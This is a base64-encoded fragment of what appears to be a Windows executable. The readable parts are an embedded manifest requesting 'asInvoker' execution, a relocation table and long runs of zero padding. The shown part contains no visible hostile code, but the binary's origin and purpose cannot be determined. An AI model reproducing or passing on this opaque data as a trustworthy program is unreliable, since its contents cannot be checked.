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o3QjdLN2A3ZjfGN8s33Tf7Nw84FTi2OLw4wjjXON845TjxOPY4+zgAOQk5VDlZOZg5nTmmOas5tDm5OcY5IzotOko6VDrDOjA7NjtCO3k7kTvdO+M77zs1PEE8TD0nPy8/ND9YP2c/ij+bP6E/rT+7P8E/0D/XP+c/7T/zP/s/AMAAALQAAAABMAcwDzAVMBswIzAsMDMwOzBEMFYwbjB0MH0wgzCNMJgw2zDzMAwxbTGWMb8xzTHTMQ8ylzKpMrsyzTLfMvEyAzMVMyczOTNLM10zbzOOM6AzsjPEM9YzbDfRN0U4JzmYOdU5TDpeOtQ69zq3O9E74DvtO/k7CTwYPB88MDw+PEk8UTxePGg8jjy/PMw81Tz5PCY9bj1/Pac92j30PRA+lD4HP38/sT/AP94/ANAAAHwAAAA4MPswJDEtMYAxiTFgMmwylzJUM10zTzRYNEQ1jjWXNb81EjYmNm02szbvNgw3KzflN+83BzgiOGU4cDhOOWo53DpBO007xTvfO+g71Tz7PAY9KD17Pbc+2D7fPgY/Ez8YPyY/VD9wP5c/uD/EP+s/+z8AAADgAACIAAAAFDA2MD0wiTCaMN4w6jCCMbgxADIPMi4ybjKZMrYy1jLrMvUywDM1NEY0WjRgNGU0pzTWNOw0CDWDNcA1yjXmNTo2QDZiNoI2yjYaN0o3eje1N+U3FTg6OFw4njjKOPo4ETk4OdA5/Tk1Omo6gTqROqE6sjq2OsI6xjrSOtY6AAAA8AAArAEAABQxGDEcMSgxLDEwMTQxQDFEMUgxnDGkMawxtDG8McQxzDHUMdwx5DHsMfQx/DEEMgwyFDIcMiQyLDI0MjwyRDJMMlQyXDJkMmwydDJ8MoQyjDKUMpwypDKsMrQyvDLEMswy1DLcMuQy7DL0MvwyBDMMMxQzHDMkMywzNDM8M0QzTDNUM1wzZDNsM3QzfDOEM4wzlDOcM6QzrDO0M7wzxDPMM9Qz3DPkM/Qz/DMENAw0FDQcNCQ0LDQ0NDw0RDRMNFQ0XDRkNGw0dDR8NIQ0jDSUNJw0pDSsNLQ0vDTENMw01DTcNOQ07DT0NPw0BDUMNRQ1HDUkNSw1NDU8NUQ1TDVUNVw1ZDVsNXQ1fDWENYw1lDWcNaQ1rDW0Nbw1xDXMNdQ13DXkNew19DX8NQQ2DDYUNhw2JDYsNjQ2PDZENkw2VDZcNvA+9D74Pvw+AD8EPwg/DD8QPxQ/GD8cPyA/JD8oPyw/MD80Pzg/PD9AP0Q/SD9MP1A/VD9YP1w/YD9kP2g/fD+AP4Q/iD+MP5A/lD+YP5w/oD+kP6g/rD/UP9g/3D8AAAAAAQBAAAAArDi0OLw4xDjMONQ43DjkOOw49Dj8OAQ5DDkUORw5JDksOTQ5PDlEOUw5VDlcOXw6gDqEOog6AAAAEAEAXAMAADgyPDJAMkQy3DLkMuwy9DL8MgQzDDMUMxwzJDMsMzQzPDNEM0wzVDNcM2QzbDN0M3wzhDOMM5QznDOkM6wztDO8M8QzzDPUM9wz5DPsM/Qz/DMENAw0FDQcNCQ0LDQ0NDw0RDRMNFQ0XDRkNGw0dDR8NIQ0jDSUNJw0pDSsNLQ0vDTENMw01DTcNOQ07DT0NPw0BDUMNRQ1HDUkNSw1NDU8NUQ1TDVUNVw1ZDVsNXQ1fDWENYw1lDWcNaQ1rDW0Nbw1xDXMNdQ13DXkNew19DX8NQQ2DDYUNhw2JDYsNjQ2PDZENkw2VDZcNmQ2bDZ0Nnw2hDaMNpQ2nDakNqw2tDa8NsQ2zDbUNtw25DbsNvQ2/DYENww3FDccNyQ3LDc0Nzw3RDdMN1Q3XDdkN2w3dDd8N4Q3jDeUN5w3pDesN7Q3vDfEN8w31DfcN+Q37Df0N/w3BDgMOBQ4HDgkOCw4NDg8OEQ4TDhUOFw4ZDhsOHQ4fDiEOIw4lDicOKQ4rDi0OLw4xDjMONQ43DjkOOw49Dj8OAQ5DDkUORw5JDksOTQ5PDlEOUw5VDlcOWQ5bDl0OXw5hDmMOZQ5nDmkOaw5tDm8OcQ5zDnUOdw55DnsOfQ5+DkAOgg6EDoYOiA6KDowOjg6QDpIOlA6WDpgOmg6cDp4OoA6iDqQOpg6oDqoOrA6uDrAOsg60DrYOuA66DrwOvg6ADsIOxA7GDsgOyg7MDs4O0A7SDtQO1g7YDtoO3A7eDuAO4g7kDuYO6A7qDuwO7g7wDvIO9A72DvgO+g78Dv4OwA8CDwQPBg8IDwoPDA8ODxAPEg8UDxYPGA8aDxwPHg8gDyIPJA8mDygPKg8sDy4PMA8yDzQPNg84DzoPPA8+DwAPQg9ED0YPSA9KD0wPTg9QD1IPVA9WD1gPWg9cD14PYA9iD2QPZg9oD2oPbA9uD3APcg90D3YPeA96D3wPfg9AD4IPhA+GD4gPig+MD44PkA+SD5QPlg+YD5oPnA+eD6APog+kD6YPqA+qD6wPrg+wD7IPtA+2D7gPug+8D74PgA/CD8QPxg/ID8oPzA/OD9AP0g/UD9YP2A/aD9wP3g/gD+IP5A/mD+gP6g/sD+4P8A/yD/QP9g/4D/oP/A/+D8AAAAgAQBQAAAAADAIMBAwGDAgMCgwMDA4MEAwSDBQMFgwYDBoMHAweDCAMIgwkDCYMKAwqDCwMLgwwDDIMNAw2DDgMOgw8DD4MAAxCDEQMQAAADABAMwAAABQM1QzWDNcM2AzZDNoM2wzcDN0M3gzfDOAM4QziDOMM5AzlDOYM5wzoDOkM6gzrDOwM7QzuDO8M8AzxDPIM8wz0DPUM9gz3DPgM+Qz6DPsM/Az9DP4M/wzADQENAg0DDQQNBQ0GDQcNCA0JDQoNCw0MDQ0NDg0PDRANEQ0SDRMNFA0VDRYNFw0YDRkNGg0bDRwNHQ0eDR8NIA0hDSINIw0kDSUNJg0nDSgNKQ0qDSsNLA0tDS4NLw0wDTENMg0zDTQNNQ0AEABALQCAACEM4gzjDOQM5QzmDOcM6AzpDOoM6wzsDO0M7gzvDPAM8QzyDPMM9Az1DPYM9wz4DPkM+gz7DPwM/Qz+DP8MwA0BDQINAw0EDQUNBg0HDQgNCQ0KDQsNDA0NDQ4NDw0QDRENEg0TDRQNFQ0WDRcNGA0ZDRoNGw0cDR0NHg0fDSANIQ0iDSMNJA0lDSYNJw0oDSkNKg0rDSwNLQ0uDS8NMA0xDTINMw00DTUNNg03DTgNOQ06DTsNPA09DT4NPw0ADUENUQ1SDXENdw17DXwNQQ2CDYYNhw2IDYoNkA2UDZUNmQ2aDZsNnQ2jDacNqA2sDa0Nrg2vDbENtw27DbwNgA3BDcINww3FDcsNzw3QDdQN1Q3XDd0N4Q3iDeYN5w3rDewN7Q3vDfUN+Q36DcAOBA4FDgYOBw4MDg0ODg4UDhUOGw4fDiAOJA4lDiYOKA4uDjIONg43DjgOOQ4+Dj8OAA5BDkMORA5FDkcOSA5JDksOTA5NDk8OUA5RDlMOVA5VDlcOWA5ZDlsOXQ5eDl8OYQ5iDmMOZA5mDmcOaQ5qDmsObQ5uDm8OcQ5yDnMOdA52DncOeA56DnsOfQ5+DkAOgg6EDoYOiA6KDosOjQ6PDpEOlw6YDp4Onw6lDqYOrA6tDrMOtA66DrsOgQ7CDsgOyQ7PDtAO1g7XDt0O3g7kDuUO6w7sDvIO8w75DvoOwA8BDwcPCA8ODw8PFQ8WDxwPHQ8jDyQPKg8rDzEPMg84DzkPPw8AD0YPSg9OD1IPVg9aD14PYg9mD2oPbg9yD3YPeg9+D0IPhg+KD44Pkg+WD5oPng+iD6YPqg+rD68PsA+0D7UPuQ+6D74Pvw+DD8QPyA/JD80Pzg/SD9MP1w/YD9wP3Q/hD+IP5g/nD+sP7A/wD/EP9Q/2D/oP+w//D8AUAEAQAEAAAAwEDAUMCQwKDA4MDwwTDBQMGAwZDB0MHgwiDCMMJwwoDAkMSwxNDE4MUAxVDFcMXAxeDGMMZQxnDGkMagxrDG0Mcgx0DHYMeAx5DHoMfAxBDIgMkAyYDJ8MoAyoDK8MsAy4DIAMyAzQDNgM4AzjDOoM7QzzDPQM+wz8DMQNDA0UDRYNFw0eDSANIQ0nDSgNLw0wDTQNPQ0ADUINTQ1ODVANUg1UDVUNVw1cDWQNaw1sDXQNfA1EDYwNjw2WDZ4Npg2uDbYNuQ27DYwN0Q3VDdkN3A3kDecN7w3yDfoN/Q3FDggOEA4SDhQOFw4fDiEOIw4mDi4OMA4yDjUOPQ4ADkkOSw5NDk8OUQ5TDlUOVw5ZDlsOXg5mDmkOcQ50DnwOfg5BDokOiw6ODpYOmQ6hDqMOpg6uDrAOgBwAQA4AQAAADAcMDgwWDB4MKAw4DAINgw2EDYUNhg2HDYgNiQ2KDYsNjA2NDY4Njw2QDZENkg2TDZQNlQ2WDZcNmA2ZDZoNmw2cDZ0Nng2fDaANoQ2iDaMNpA2lDaYNpw2oDakNqg2rDawNrw2wDbENsg2zDbQNtQ22DbcNuA25DboNuw28Db0Nvg2/DYANwQ3CDcMNxA3FDcYNxw3IDckNyg3LDcwNzQ3ODc8N0A3RDdIN0w3UDdUN1g3XDdgN2Q3aDdsN5Q3pDe0N8Q31Df0NwA4BDgIOAw4NDg4ODw48DkwOzQ7ODs8O0A7RDtIO0w7UDtUO2A7aDtsO3A7dDt4O3w7gDuEO4g7jDuYO5w7oDukO6g7rDuwO7Q7wDvEO8g70DtwPpw+yD7sPhg/SD98P6g/2D8AAACAAQA0AAAACDA8MGQwhDCkMMAw3DD4MBgxNDFUMXAxmDHEMegxBDIgMjgyVDJsMnAydDIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA